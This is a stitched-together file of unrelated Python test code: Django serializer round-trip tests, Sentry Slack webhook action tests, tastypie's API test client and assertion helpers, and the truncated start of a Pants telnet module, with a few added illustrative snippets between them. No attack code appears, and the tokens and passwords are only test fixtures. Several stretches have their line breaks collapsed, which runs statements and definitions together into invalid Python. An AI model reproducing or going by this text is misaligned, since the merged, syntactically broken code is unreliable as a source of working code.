"fe80:1424:2223:6cff:fe8a:2e8a:2151:abcd"), # (pk_obj, 700, NullBooleanPKData, True), # (pk_obj, 701, NullBooleanPKData, False), (pk_obj, 710, PhonePKData, "212-634-5789"), (pk_obj, 720, PositiveIntegerPKData, 123456789), (pk_obj, 730, PositiveSmallIntegerPKData, 12), (pk_obj, 740, SlugPKData, "this-is-a-slug"), 
    (pk_obj, 750, SmallPKData, 12),
    (pk_obj, 751, SmallPKData, -12),
    (pk_obj, 752, SmallPKData, 0),
    # (pk_obj, 760, TextPKData, """This is a long piece of text.
    # It contains line breaks.
    # Several of them.
    # The end."""),
    # (pk_obj, 770, TimePKData, datetime.time(10,42,37)),
    (pk_obj, 780, USStatePKData, "MA"),
    # (pk_obj, 790, XMLPKData, "<foo></foo>"),
    (data_obj, 800, AutoNowDateTimeData, datetime.datetime(2006,6,16,10,42,37)),
    (data_obj, 810, ModifyingSaveData, 42),
    (inherited_obj, 900, InheritAbstractModel, {'child_data':37,'parent_data':42}),
    (inherited_obj, 910, ExplicitInheritBaseModel, {'child_data':37,'parent_data':42}),
    (inherited_obj, 920, InheritBaseModel, {'child_data':37,'parent_data':42}),
    (data_obj, 1000, BigIntegerData, 9223372036854775807),
    (data_obj, 1001, BigIntegerData, -9223372036854775808),
    (data_obj, 1002, BigIntegerData, 0),
    (data_obj, 1003, BigIntegerData, None),
    (data_obj, 1004, LengthModel, 0),
    (data_obj, 1005, LengthModel, 1),
]

natural_key_test_data = [
    (data_obj, 1100, NaturalKeyAnchor, "Natural Key Anchor"),
    (fk_obj, 1101, FKDataNaturalKey, 1100),
    (fk_obj, 1102, FKDataNaturalKey, None),
]

# Because Oracle treats the empty string as NULL, Oracle is expected to fail
# when field.empty_strings_allowed is True and the value is None; skip these
# tests.
if connection.features.interprets_empty_strings_as_nulls:
    test_data = [data for data in test_data
                 if not (data[0] == data_obj and
                         data[2]._meta.get_field('data').empty_strings_allowed and
                         data[3] is None)]

# Regression test for #8651 -- a FK to an object with PK of 0.
# This won't work on MySQL since it won't let you create an object
# with a primary key of 0.
if connection.features.allows_primary_key_0:
    test_data.extend([
        (data_obj, 0, Anchor, "Anchor 0"),
        (fk_obj, 465, FKData, 0),
    ])

# Dynamically create serializer tests to ensure that all
# registered serializers are automatically tested.
class SerializerTests(TestCase):
    def test_get_unknown_serializer(self):
        """
        #15889: get_serializer('nonsense') raises a SerializerDoesNotExist
        """
        with self.assertRaises(SerializerDoesNotExist):
            serializers.get_serializer("nonsense")

        with self.assertRaises(KeyError):
            serializers.get_serializer("nonsense")

        # SerializerDoesNotExist is instantiated with the nonexistent format
        with self.assertRaises(SerializerDoesNotExist) as cm:
            serializers.get_serializer("nonsense")
        self.assertEqual(cm.exception.args, ("nonsense",))

    def test_unregister_unknown_serializer(self):
        with self.assertRaises(SerializerDoesNotExist):
            serializers.unregister_serializer("nonsense")

    def test_get_unknown_deserializer(self):
        with self.assertRaises(SerializerDoesNotExist):
            serializers.get_deserializer("nonsense")

    def test_json_deserializer_exception(self):
        with self.assertRaises(DeserializationError):
            for obj in serializers.deserialize("json", """[{"pk":1}"""):
                pass

    @skipUnless(yaml, "PyYAML not installed")
    def test_yaml_deserializer_exception(self):
        with self.assertRaises(DeserializationError):
            for obj in serializers.deserialize("yaml", "{"):
                pass

    def test_serialize_proxy_model(self):
        BaseModel.objects.create(parent_data=1)
        base_objects = BaseModel.objects.all()
        proxy_objects = ProxyBaseModel.objects.all()
        proxy_proxy_objects = ProxyProxyBaseModel.objects.all()
        base_data = serializers.serialize("json", base_objects)
        proxy_data = serializers.serialize("json", proxy_objects)
        proxy_proxy_data = serializers.serialize("json", proxy_proxy_objects)
        self.assertEqual(base_data, proxy_data.replace('proxy', ''))
        self.assertEqual(base_data, proxy_proxy_data.replace('proxy', ''))


def serializerTest(format, self):
    # Create all the objects defined in the test data
    objects = []
    instance_count = {}
    for (func, pk, klass, datum) in test_data:
        with connection.constraint_checks_disabled():
            objects.extend(func[0](pk, klass, datum))

    # Get a count of the number of objects created for each class
    for klass in instance_count:
        instance_count[klass] = klass.objects.count()

    # Add the generic tagged objects to the object list
    objects.extend(Tag.objects.all())

    # Serialize the test database
    serialized_data = serializers.serialize(format, objects, indent=2)

    for obj in serializers.deserialize(format, serialized_data):
        obj.save()

    # Assert that the deserialized data is the same
    # as the original source
    for (func, pk, klass, datum) in test_data:
        func[1](self, pk, klass, datum)

    # Assert that the number of objects deserialized is the
    # same as the number that was serialized.
    for klass, count in instance_count.items():
        self.assertEqual(count, klass.objects.count())


def naturalKeySerializerTest(format, self):
    # Create all the objects defined in the test data
    objects = []
    instance_count = {}
    for (func, pk, klass, datum) in natural_key_test_data:
        with connection.constraint_checks_disabled():
            objects.extend(func[0](pk, klass, datum))

    # Get a count of the number of objects created for each class
    for klass in instance_count:
        instance_count[klass] = klass.objects.count()

    # Serialize the test database
    serialized_data = serializers.serialize(format, objects, indent=2, use_natural_keys=True)

    for obj in serializers.deserialize(format, serialized_data):
        obj.save()

    # Assert that the deserialized data is the same
    # as the original source
    for (func, pk, klass, datum) in natural_key_test_data:
        func[1](self, pk, klass, datum)

    # Assert that the number of objects deserialized is the
    # same as the number that was serialized.
for klass, count in instance_count.items(): self.assertEqual(count, klass.objects.count()) def fieldsTest(format, self): obj = ComplexModel(field1='first', field2='second', field3='third') obj.save_base(raw=True) # Serialize then deserialize the test database serialized_data = serializers.serialize(format, [obj], indent=2, fields=('field1','field3')) result = six.advance_iterator(serializers.deserialize(format, serialized_data)) # Check that the deserialized object contains data in only the serialized fields. self.assertEqual(result.object.field1, 'first') self.assertEqual(result.object.field2, '') self.assertEqual(result.object.field3, 'third') def streamTest(format, self): obj = ComplexModel(field1='first',field2='second',field3='third') obj.save_base(raw=True) # Serialize the test database to a stream for stream in (StringIO(), HttpResponse()): serializers.serialize(format, [obj], indent=2, stream=stream) # Serialize normally for a comparison string_data = serializers.serialize(format, [obj], indent=2) # Check that the two are the same if not isinstance(stream, HttpResponse): self.assertEqual(string_data, stream.getvalue()) else: self.assertEqual(string_data.encode('utf-8'), stream.content) stream.close() for format in serializers.get_serializer_formats(): setattr(SerializerTests, 'test_' + format + '_serializer', curry(serializerTest, format)) setattr(SerializerTests, 'test_' + format + '_natural_key_serializer', curry(naturalKeySerializerTest, format)) setattr(SerializerTests, 'test_' + format + '_serializer_fields', curry(fieldsTest, format)) if format != 'python': setattr(SerializerTests, 'test_' + format + '_serializer_stream', curry(streamTest, format))
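# ---------------------------------------------------------------------------
# Hedged side note (not part of the suite above): the setattr/curry loop works
# because ``curry`` returns a plain function, which the class then binds as a
# method -- that is why serializerTest takes ``(format, self)`` in that order.
# A self-contained, stdlib-only miniature of the same dynamic test-generation
# pattern (names are made up for illustration):
import unittest


def _make_round_trip_test(fmt):
    def test(self):
        # Stand-in body; the real tests above serialize and re-load the test database.
        self.assertIn(fmt, ('json', 'xml', 'yaml'))
    return test


class MiniDynamicSerializerTests(unittest.TestCase):
    pass


for fmt in ('json', 'xml', 'yaml'):
    setattr(MiniDynamicSerializerTests, 'test_%s_round_trip' % fmt, _make_round_trip_test(fmt))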
from __future__ import absolute_import import responses from six.moves.urllib.parse import parse_qs from mock import patch from sentry import options from sentry.models import ( Integration, OrganizationIntegration, Identity, IdentityProvider, IdentityStatus, Group, GroupStatus, GroupAssignee, AuthProvider, AuthIdentity, ) from sentry.testutils import APITestCase from sentry.utils import json from sentry.integrations.slack.action_endpoint import LINK_IDENTITY_MESSAGE from sentry.integrations.slack.link_identity import build_linking_url class BaseEventTest(APITestCase): def setUp(self): super(BaseEventTest, self).setUp() self.user = self.create_user(is_superuser=False) self.org = self.create_organization(owner=None) self.team = self.create_team(organization=self.org, members=[self.user]) self.integration = Integration.objects.create( provider="slack", external_id="TXXXXXXX1", metadata={"access_token": "xoxa-xxxxxxxxx-xxxxxxxxxx-xxxxxxxxxxxx"}, ) OrganizationIntegration.objects.create(organization=self.org, integration=self.integration) self.idp = IdentityProvider.objects.create(type="slack", external_id="TXXXXXXX1", config={}) self.identity = Identity.objects.create( external_id="slack_id", idp=self.idp, user=self.user, status=IdentityStatus.VALID, scopes=[], ) self.project1 = self.create_project(organization=self.org) self.group1 = self.create_group(project=self.project1) self.trigger_id = "13345224609.738474920.8088930838d88f008e0" self.response_url = ( "https://hooks.slack.com/actions/T47563693/6204672533/x7ZLaiVMoECAW50Gw1ZYAXEM" ) def post_webhook( self, action_data=None, type="event_callback", data=None, token=None, team_id="TXXXXXXX1", callback_id=None, slack_user=None, original_message=None, ): if token is None: token = options.get("slack.verification-token") if slack_user is None: slack_user = {"id": self.identity.external_id, "domain": "example"} if callback_id is None: callback_id = json.dumps({"issue": self.group1.id}) if original_message is None: original_message = {} payload = { "token": token, "team": {"id": team_id, "domain": "example.com"}, "channel": {"id": "C065W1189", "domain": "forgotten-works"}, "user": slack_user, "callback_id": callback_id, "action_ts": "1458170917.164398", "message_ts": "1458170866.000004", "original_message": original_message, "trigger_id": self.trigger_id, "response_url": self.response_url, "attachment_id": "1", "actions": action_data or [], "type": type, } if data: payload.update(data) payload = {"payload": json.dumps(payload)} return self.client.post("/extensions/slack/action/", data=payload) class StatusActionTest(BaseEventTest): @patch("sentry.integrations.slack.link_identity.sign") def test_ask_linking(self, sign): sign.return_value = "signed_parameters" resp = self.post_webhook(slack_user={"id": "invalid-id", "domain": "example"}) associate_url = build_linking_url( self.integration, self.org, "invalid-id", "C065W1189", self.response_url ) assert resp.status_code == 200, resp.content assert resp.data["response_type"] == "ephemeral" assert resp.data["text"] == LINK_IDENTITY_MESSAGE.format(associate_url=associate_url) def test_ignore_issue(self): status_action = {"name": "status", "value": "ignored", "type": "button"} resp = self.post_webhook(action_data=[status_action]) self.group1 = Group.objects.get(id=self.group1.id) assert resp.status_code == 200, resp.content assert self.group1.get_status() == GroupStatus.IGNORED expect_status = u"*Issue ignored by <@{}>*".format(self.identity.external_id) assert resp.data["text"].endswith(expect_status), 
resp.data["text"] def test_ignore_issue_with_additional_user_auth(self): """ Ensure that we can act as a user even when the organization has SSO enabled """ auth_idp = AuthProvider.objects.create(organization=self.org, provider="dummy") AuthIdentity.objects.create(auth_provider=auth_idp, user=self.user) status_action = {"name": "status", "value": "ignored", "type": "button"} resp = self.post_webhook(action_data=[status_action]) self.group1 = Group.objects.get(id=self.group1.id) assert resp.status_code == 200, resp.content assert self.group1.get_status() == GroupStatus.IGNORED expect_status = u"*Issue ignored by <@{}>*".format(self.identity.external_id) assert resp.data["text"].endswith(expect_status), resp.data["text"] def test_assign_issue(self): user2 = self.create_user(is_superuser=False) self.create_member(user=user2, organization=self.org, teams=[self.team]) # Assign to user status_action = { "name": "assign", "selected_options": [{"value": u"user:{}".format(user2.id)}], } resp = self.post_webhook(action_data=[status_action]) assert resp.status_code == 200, resp.content assert GroupAssignee.objects.filter(group=self.group1, user=user2).exists() expect_status = u"*Issue assigned to {assignee} by <@{assigner}>*".format( assignee=user2.get_display_name(), assigner=self.identity.external_id ) # Assign to team status_action = { "name": "assign", "selected_options": [{"value": u"team:{}".format(self.team.id)}], } resp = self.post_webhook(action_data=[status_action]) assert resp.status_code == 200, resp.content assert GroupAssignee.objects.filter(group=self.group1, team=self.team).exists() expect_status = u"*Issue assigned to #{team} by <@{assigner}>*".format( team=self.team.slug, assigner=self.identity.external_id ) assert resp.data["text"].endswith(expect_status), resp.data["text"] def test_assign_issue_user_has_identity(self): user2 = self.create_user(is_superuser=False) self.create_member(user=user2, organization=self.org, teams=[self.team]) user2_identity = Identity.objects.create( external_id="slack_id2", idp=self.idp, user=user2, status=IdentityStatus.VALID, scopes=[], ) status_action = { "name": "assign", "selected_options": [{"value": u"user:{}".format(user2.id)}], } resp = self.post_webhook(action_data=[status_action]) assert resp.status_code == 200, resp.content assert GroupAssignee.objects.filter(group=self.group1, user=user2).exists() expect_status = u"*Issue assigned to <@{assignee}> by <@{assigner}>*".format( assignee=user2_identity.external_id, assigner=self.identity.external_id ) assert resp.data["text"].endswith(expect_status), resp.data["text"] def test_response_differs_on_bot_message(self): status_action = {"name": "status", "value": "ignored", "type": "button"} original_message = {"type": "message"} resp = self.post_webhook(action_data=[status_action], original_message=original_message) self.group1 = Group.objects.get(id=self.group1.id) assert resp.status_code == 200, resp.content assert "attachments" in resp.data assert resp.data["attachments"][0]["title"] == self.group1.title def test_assign_user_with_multiple_identities(self): org2 = self.create_organization(owner=None) integration2 = Integration.objects.create( provider="slack", external_id="TXXXXXXX2", metadata={"access_token": "xoxa-xxxxxxxxx-xxxxxxxxxx-xxxxxxxxxxxx"}, ) OrganizationIntegration.objects.create(organization=org2, integration=integration2) idp2 = IdentityProvider.objects.create(type="slack", external_id="TXXXXXXX2", config={}) Identity.objects.create( external_id="slack_id2", idp=idp2, user=self.user, 
status=IdentityStatus.VALID, scopes=[], ) status_action = { "name": "assign", "selected_options": [{"value": u"user:{}".format(self.user.id)}], } resp = self.post_webhook(action_data=[status_action]) assert resp.status_code == 200, resp.content assert GroupAssignee.objects.filter(group=self.group1, user=self.user).exists() expect_status = u"*Issue assigned to <@{assignee}> by <@{assignee}>*".format( assignee=self.identity.external_id ) assert resp.data["text"].endswith(expect_status), resp.data["text"] @responses.activate def test_resolve_issue(self): status_action = {"name": "resolve_dialog", "value": "resolve_dialog"} # Expect request to open dialog on slack responses.add( method=responses.POST, url="https://slack.com/api/dialog.open", body='{"ok": true}', status=200, content_type="application/json", ) resp = self.post_webhook(action_data=[status_action]) assert resp.status_code == 200, resp.content # Opening dialog should *not* cause the current message to be updated assert resp.content == "" data = parse_qs(responses.calls[0].request.body) assert data["token"][0] == self.integration.metadata["access_token"] assert data["trigger_id"][0] == self.trigger_id assert "dialog" in data dialog = json.loads(data["dialog"][0]) callback_data = json.loads(dialog["callback_id"]) assert int(callback_data["issue"]) == self.group1.id assert callback_data["orig_response_url"] == self.response_url # Completing the dialog will update the message responses.add( method=responses.POST, url=self.response_url, body='{"ok": true}', status=200, content_type="application/json", ) resp = self.post_webhook( type="dialog_submission", callback_id=dialog["callback_id"], data={"submission": {"resolve_type": "resolved"}}, ) self.group1 = Group.objects.get(id=self.group1.id) assert resp.status_code == 200, resp.content assert self.group1.get_status() == GroupStatus.RESOLVED update_data = json.loads(responses.calls[1].request.body) expect_status = u"*Issue resolved by <@{}>*".format(self.identity.external_id) assert update_data["text"].endswith(expect_status) def test_permission_denied(self): user2 = self.create_user(is_superuser=False) user2_identity = Identity.objects.create( external_id="slack_id2", idp=self.idp, user=user2, status=IdentityStatus.VALID, scopes=[], ) status_action = {"name": "status", "value": "ignored", "type": "button"} resp = self.post_webhook( action_data=[status_action], slack_user={"id": user2_identity.external_id} ) self.group1 = Group.objects.get(id=self.group1.id) assert resp.status_code == 200, resp.content assert not self.group1.get_status() == GroupStatus.IGNORED assert resp.data["response_type"] == "ephemeral" assert not resp.data["replace_original"] assert resp.data["text"] == "Sentry can't perform that action right now on your behalf!" def test_invalid_token(self): resp = self.post_webhook(token="invalid") assert resp.status_code == 401 def test_no_integration(self): self.integration.delete() resp = self.post_webhook() assert resp.status_code == 403 def test_slack_bad_payload(self): resp = self.client.post("/extensions/slack/action/", data={"nopayload": 0}) assert resp.status_code == 400
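# ---------------------------------------------------------------------------
# Hedged mini-example (separate from the tests above): the resolve-dialog test
# relies on the ``responses`` library to intercept the outgoing Slack API call
# and on ``parse_qs`` to inspect its form-encoded body. The same pattern in
# isolation, with made-up token and trigger values:
import requests


@responses.activate
def _demo_intercept_dialog_open():
    responses.add(
        method=responses.POST,
        url="https://slack.com/api/dialog.open",
        body='{"ok": true}',
        status=200,
        content_type="application/json",
    )
    requests.post(
        "https://slack.com/api/dialog.open",
        data={"token": "xoxa-fake", "trigger_id": "123.456.abc", "dialog": "{}"},
    )
    # The intercepted request body is form-encoded, just like in test_resolve_issue.
    sent = parse_qs(responses.calls[0].request.body)
    assert sent["token"][0] == "xoxa-fake"
    assert sent["trigger_id"][0] == "123.456.abc"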
from __future__ import unicode_literals import time from django.conf import settings from django.test import TestCase from django.test.client import FakePayload, Client from django.utils.encoding import force_text from tastypie.serializers import Serializer try: from urllib.parse import urlparse except ImportError: from urlparse import urlparse class TestApiClient(object): def __init__(self, serializer=None): """ Sets up a fresh ``TestApiClient`` instance. If you are employing a custom serializer, you can pass the class to the ``serializer=`` kwarg. """ self.client = Client() self.serializer = serializer if not self.serializer: self.serializer = Serializer() def get_content_type(self, short_format): """ Given a short name (such as ``json`` or ``xml``), returns the full content-type for it (``application/json`` or ``application/xml`` in this case). """ return self.serializer.content_types.get(short_format, 'json') def get(self, uri, format='json', data=None, authentication=None, **kwargs): """ Performs a simulated ``GET`` request to the provided URI. Optionally accepts a ``data`` kwarg, which in the case of ``GET``, lets you send along ``GET`` parameters. This is useful when testing filtering or other things that read off the ``GET`` params. Example:: from tastypie.test import TestApiClient client = TestApiClient() response = client.get('/api/v1/entry/1/', data={'format': 'json', 'title__startswith': 'a', 'limit': 20, 'offset': 60}) Optionally accepts an ``authentication`` kwarg, which should be an HTTP header with the correct authentication data already setup. All other ``**kwargs`` passed in get passed through to the Django ``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client for details. """ content_type = self.get_content_type(format) kwargs['HTTP_ACCEPT'] = content_type # GET & DELETE are the only times we don't serialize the data. if data is not None: kwargs['data'] = data if authentication is not None: kwargs['HTTP_AUTHORIZATION'] = authentication return self.client.get(uri, **kwargs) def post(self, uri, format='json', data=None, authentication=None, **kwargs): """ Performs a simulated ``POST`` request to the provided URI. Optionally accepts a ``data`` kwarg. **Unlike** ``GET``, in ``POST`` the ``data`` gets serialized & sent as the body instead of becoming part of the URI. Example:: from tastypie.test import TestApiClient client = TestApiClient() response = client.post('/api/v1/entry/', data={ 'created': '2012-05-01T20:02:36', 'slug': 'another-post', 'title': 'Another Post', 'user': '/api/v1/user/1/', }) Optionally accepts an ``authentication`` kwarg, which should be an HTTP header with the correct authentication data already setup. All other ``**kwargs`` passed in get passed through to the Django ``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client for details. """ content_type = self.get_content_type(format) kwargs['content_type'] = content_type if data is not None: kwargs['data'] = self.serializer.serialize(data, format=content_type) if authentication is not None: kwargs['HTTP_AUTHORIZATION'] = authentication return self.client.post(uri, **kwargs) def put(self, uri, format='json', data=None, authentication=None, **kwargs): """ Performs a simulated ``PUT`` request to the provided URI. Optionally accepts a ``data`` kwarg. **Unlike** ``GET``, in ``PUT`` the ``data`` gets serialized & sent as the body instead of becoming part of the URI. 
Example:: from tastypie.test import TestApiClient client = TestApiClient() response = client.put('/api/v1/entry/1/', data={ 'created': '2012-05-01T20:02:36', 'slug': 'another-post', 'title': 'Another Post', 'user': '/api/v1/user/1/', }) Optionally accepts an ``authentication`` kwarg, which should be an HTTP header with the correct authentication data already setup. All other ``**kwargs`` passed in get passed through to the Django ``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client for details. """ content_type = self.get_content_type(format) kwargs['content_type'] = content_type if data is not None: kwargs['data'] = self.serializer.serialize(data, format=content_type) if authentication is not None: kwargs['HTTP_AUTHORIZATION'] = authentication return self.client.put(uri, **kwargs) def patch(self, uri, format='json', data=None, authentication=None, **kwargs): """ Performs a simulated ``PATCH`` request to the provided URI. Optionally accepts a ``data`` kwarg. **Unlike** ``GET``, in ``PATCH`` the ``data`` gets serialized & sent as the body instead of becoming part of the URI. Example:: from tastypie.test import TestApiClient client = TestApiClient() response = client.patch('/api/v1/entry/1/', data={ 'created': '2012-05-01T20:02:36', 'slug': 'another-post', 'title': 'Another Post', 'user': '/api/v1/user/1/', }) Optionally accepts an ``authentication`` kwarg, which should be an HTTP header with the correct authentication data already setup. All other ``**kwargs`` passed in get passed through to the Django ``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client for details. """ content_type = self.get_content_type(format) kwargs['content_type'] = content_type if data is not None: kwargs['data'] = self.serializer.serialize(data, format=content_type) if authentication is not None: kwargs['HTTP_AUTHORIZATION'] = authentication # This hurts because Django doesn't support PATCH natively. parsed = urlparse(uri) r = { 'CONTENT_LENGTH': len(kwargs['data']), 'CONTENT_TYPE': content_type, 'PATH_INFO': self.client._get_path(parsed), 'QUERY_STRING': parsed[4], 'REQUEST_METHOD': 'PATCH', 'wsgi.input': FakePayload(kwargs['data']), } r.update(kwargs) return self.client.request(**r) def delete(self, uri, format='json', data=None, authentication=None, **kwargs): """ Performs a simulated ``DELETE`` request to the provided URI. Optionally accepts a ``data`` kwarg, which in the case of ``DELETE``, lets you send along ``DELETE`` parameters. This is useful when testing filtering or other things that read off the ``DELETE`` params. Example:: from tastypie.test import TestApiClient client = TestApiClient() response = client.delete('/api/v1/entry/1/', data={'format': 'json'}) Optionally accepts an ``authentication`` kwarg, which should be an HTTP header with the correct authentication data already setup. All other ``**kwargs`` passed in get passed through to the Django ``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client for details. """ content_type = self.get_content_type(format) kwargs['content_type'] = content_type # GET & DELETE are the only times we don't serialize the data. if data is not None: kwargs['data'] = data if authentication is not None: kwargs['HTTP_AUTHORIZATION'] = authentication return self.client.delete(uri, **kwargs) class ResourceTestCase(TestCase): """ A useful base class for the start of testing Tastypie APIs. 
""" def setUp(self): super(ResourceTestCase, self).setUp() self.serializer = Serializer() self.api_client = TestApiClient() def get_credentials(self): """ A convenience method for the user as a way to shorten up the often repetitious calls to create the same authentication. Raises ``NotImplementedError`` by default. Usage:: class MyResourceTestCase(ResourceTestCase): def get_credentials(self): return self.create_basic('daniel', 'pass') # Then the usual tests... """ raise NotImplementedError("You must return the class for your Resource to test.") def create_basic(self, username, password): """ Creates & returns the HTTP ``Authorization`` header for use with BASIC Auth. """ import base64 return 'Basic %s' % base64.b64encode(':'.join([username, password]).encode('utf-8')).decode('utf-8') def create_apikey(self, username, api_key): """ Creates & returns the HTTP ``Authorization`` header for use with ``ApiKeyAuthentication``. """ return 'ApiKey %s:%s' % (username, api_key) def create_digest(self, username, api_key, method, uri): """ Creates & returns the HTTP ``Authorization`` header for use with Digest Auth. """ from tastypie.authentication import hmac, sha1, uuid, python_digest new_uuid = uuid.uuid4() opaque = hmac.new(str(new_uuid).encode('utf-8'), digestmod=sha1).hexdigest().decode('utf-8') return python_digest.build_authorization_request( username, method.upper(), uri, 1, # nonce_count digest_challenge=python_digest.build_digest_challenge(time.time(), getattr(settings, 'SECRET_KEY', ''), 'django-tastypie', opaque, False), password=api_key ) def create_oauth(self, user): """ Creates & returns the HTTP ``Authorization`` header for use with Oauth. """ from oauth_provider.models import Consumer, Token, Resource # Necessary setup for ``oauth_provider``. resource, _ = Resource.objects.get_or_create(url='test', defaults={ 'name': 'Test Resource' }) consumer, _ = Consumer.objects.get_or_create(key='123', defaults={ 'name': 'Test', 'description': 'Testing...' }) token, _ = Token.objects.get_or_create(key='foo', token_type=Token.ACCESS, defaults={ 'consumer': consumer, 'resource': resource, 'secret': '', 'user': user, }) # Then generate the header. oauth_data = { 'oauth_consumer_key': '123', 'oauth_nonce': 'abc', 'oauth_signature': '&', 'oauth_signature_method': 'PLAINTEXT', 'oauth_timestamp': str(int(time.time())), 'oauth_token': 'foo', } return 'OAuth %s' % ','.join([key+'='+value for key, value in oauth_data.items()]) def assertHttpOK(self, resp): """ Ensures the response is returning a HTTP 200. """ return self.assertEqual(resp.status_code, 200) def assertHttpCreated(self, resp): """ Ensures the response is returning a HTTP 201. """ return self.assertEqual(resp.status_code, 201) def assertHttpAccepted(self, resp): """ Ensures the response is returning either a HTTP 202 or a HTTP 204. """ self.assertIn(resp.status_code, [202, 204]) self.assertNotIn('Content-Type', resp) def assertHttpMultipleChoices(self, resp): """ Ensures the response is returning a HTTP 300. """ return self.assertEqual(resp.status_code, 300) def assertHttpSeeOther(self, resp): """ Ensures the response is returning a HTTP 303. """ return self.assertEqual(resp.status_code, 303) def assertHttpNotModified(self, resp): """ Ensures the response is returning a HTTP 304. """ return self.assertEqual(resp.status_code, 304) def assertHttpBadRequest(self, resp): """ Ensures the response is returning a HTTP 400. 
""" return self.assertEqual(resp.status_code, 400) def assertHttpUnauthorized(self, resp): """ Ensures the response is returning a HTTP 401. """ return self.assertEqual(resp.status_code, 401) def assertHttpForbidden(self, resp): """ Ensures the response is returning a HTTP 403. """ return self.assertEqual(resp.status_code, 403) def assertHttpNotFound(self, resp): """ Ensures the response is returning a HTTP 404. """ return self.assertEqual(resp.status_code, 404) def assertHttpMethodNotAllowed(self, resp): """ Ensures the response is returning a HTTP 405. """ return self.assertEqual(resp.status_code, 405) def assertHttpConflict(self, resp): """ Ensures the response is returning a HTTP 409. """ return self.assertEqual(resp.status_code, 409) def assertHttpGone(self, resp): """ Ensures the response is returning a HTTP 410. """ return self.assertEqual(resp.status_code, 410) def assertHttpUnprocessableEntity(self, resp): """ Ensures the response is returning a HTTP 422. """ return self.assertEqual(resp.status_code, 422) def assertHttpTooManyRequests(self, resp): """ Ensures the response is returning a HTTP 429. """ return self.assertEqual(resp.status_code, 429) def assertHttpApplicationError(self, resp): """ Ensures the response is returning a HTTP 500. """ return self.assertEqual(resp.status_code, 500) def assertHttpNotImplemented(self, resp): """ Ensures the response is returning a HTTP 501. """ return self.assertEqual(resp.status_code, 501) def assertValidJSON(self, data): """ Given the provided ``data`` as a string, ensures that it is valid JSON & can be loaded properly. """ # Just try the load. If it throws an exception, the test case will fail. self.serializer.from_json(data) def assertValidXML(self, data): """ Given the provided ``data`` as a string, ensures that it is valid XML & can be loaded properly. """ # Just try the load. If it throws an exception, the test case will fail. self.serializer.from_xml(data) def assertValidYAML(self, data): """ Given the provided ``data`` as a string, ensures that it is valid YAML & can be loaded properly. """ # Just try the load. If it throws an exception, the test case will fail. self.serializer.from_yaml(data) def assertValidPlist(self, data): """ Given the provided ``data`` as a string, ensures that it is valid binary plist & can be loaded properly. """ # Just try the load. If it throws an exception, the test case will fail. 
self.serializer.from_plist(data) def assertValidJSONResponse(self, resp): """ Given a ``HttpResponse`` coming back from using the ``client``, assert that you get back: * An HTTP 200 * The correct content-type (``application/json``) * The content is valid JSON """ self.assertHttpOK(resp) self.assertTrue(resp['Content-Type'].startswith('application/json')) self.assertValidJSON(force_text(resp.content)) def assertValidXMLResponse(self, resp): """ Given a ``HttpResponse`` coming back from using the ``client``, assert that you get back: * An HTTP 200 * The correct content-type (``application/xml``) * The content is valid XML """ self.assertHttpOK(resp) self.assertTrue(resp['Content-Type'].startswith('application/xml')) self.assertValidXML(force_text(resp.content)) def assertValidYAMLResponse(self, resp): """ Given a ``HttpResponse`` coming back from using the ``client``, assert that you get back: * An HTTP 200 * The correct content-type (``text/yaml``) * The content is valid YAML """ self.assertHttpOK(resp) self.assertTrue(resp['Content-Type'].startswith('text/yaml')) self.assertValidYAML(force_text(resp.content)) def assertValidPlistResponse(self, resp): """ Given a ``HttpResponse`` coming back from using the ``client``, assert that you get back: * An HTTP 200 * The correct content-type (``application/x-plist``) * The content is valid binary plist data """ self.assertHttpOK(resp) self.assertTrue(resp['Content-Type'].startswith('application/x-plist')) self.assertValidPlist(force_text(resp.content)) def deserialize(self, resp): """ Given a ``HttpResponse`` coming back from using the ``client``, this method checks the ``Content-Type`` header & attempts to deserialize the data based on that. It returns a Python datastructure (typically a ``dict``) of the serialized data. """ return self.serializer.deserialize(resp.content, format=resp['Content-Type']) def serialize(self, data, format='application/json'): """ Given a Python datastructure (typically a ``dict``) & a desired content-type, this method will return a serialized string of that data. """ return self.serializer.serialize(data, format=format) def assertKeys(self, data, expected): """ This method ensures that the keys of the ``data`` match up to the keys of ``expected``. It covers the (extremely) common case where you want to make sure the keys of a response match up to what is expected. This is typically less fragile than testing the full structure, which can be prone to data changes. """ self.assertEqual(sorted(data.keys()), sorted(expected))
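# ---------------------------------------------------------------------------
# Hedged usage sketch (not shipped with tastypie): putting the helpers above
# together. ``EntryResource`` mounted at ``/api/v1/entry/`` and the
# ``daniel``/``pass`` credentials are hypothetical fixtures for illustration.
class EntryResourceTestCase(ResourceTestCase):
    def get_credentials(self):
        return self.create_basic(username='daniel', password='pass')

    def test_get_list_json(self):
        resp = self.api_client.get('/api/v1/entry/', format='json',
                                   authentication=self.get_credentials())
        self.assertValidJSONResponse(resp)
        # Tastypie list endpoints conventionally expose 'meta' and 'objects'.
        self.assertKeys(self.deserialize(resp), ['meta', 'objects'])

    def test_post_list_unauthenticated(self):
        # Assumes the hypothetical resource requires authentication for writes.
        self.assertHttpUnauthorized(self.api_client.post('/api/v1/entry/', format='json', data={}))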
############################################################################### # # Copyright 2011-2012 Pants Developers (see AUTHORS.txt) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ############################################################################### ############################################################################### # Imports ############################################################################### import re import struct from pants import Stream, Server try: from netstruct import NetStruct as _NetStruct except ImportError: # Create the fake class because isinstance expects a class. class _NetStruct(object): def __init__(self, *a, **kw): raise NotImplementedError ############################################################################### # Logging ############################################################################### import logging log = logging.getLogger(__name__) ############################################################################### # Constants ############################################################################### RegexType = type(re.compile("")) Struct = struct.Struct # Telnet commands IAC = chr(255) # Interpret As Command DONT = chr(254) # Don't Perform DO = chr(253) # Do Perform WONT = chr(252) # Won't Perform WILL = chr(251) # Will Perform SB = chr(250) # Subnegotiation Begin SE = chr(240) # Subnegotiation End ############################################################################### # TelnetConnection Class ############################################################################### class TelnetConnection(Stream): """ A basic implementation of a Telnet connection. A 